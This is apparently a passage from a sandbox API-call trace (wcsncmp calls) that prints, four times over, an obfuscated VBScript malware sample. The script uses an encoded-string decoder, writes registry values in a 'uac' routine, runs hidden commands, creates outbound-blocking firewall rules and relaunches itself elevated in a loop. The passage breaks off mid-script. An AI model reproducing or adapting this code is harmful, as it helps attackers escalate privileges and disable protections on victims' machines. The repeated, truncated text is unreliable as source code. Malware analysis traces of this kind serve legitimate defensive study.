bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.978] wcsncmp (_String1="rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.978] wcsncmp (_String1="ule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.978] wcsncmp (_String1="le\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.978] wcsncmp (_String1="e\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 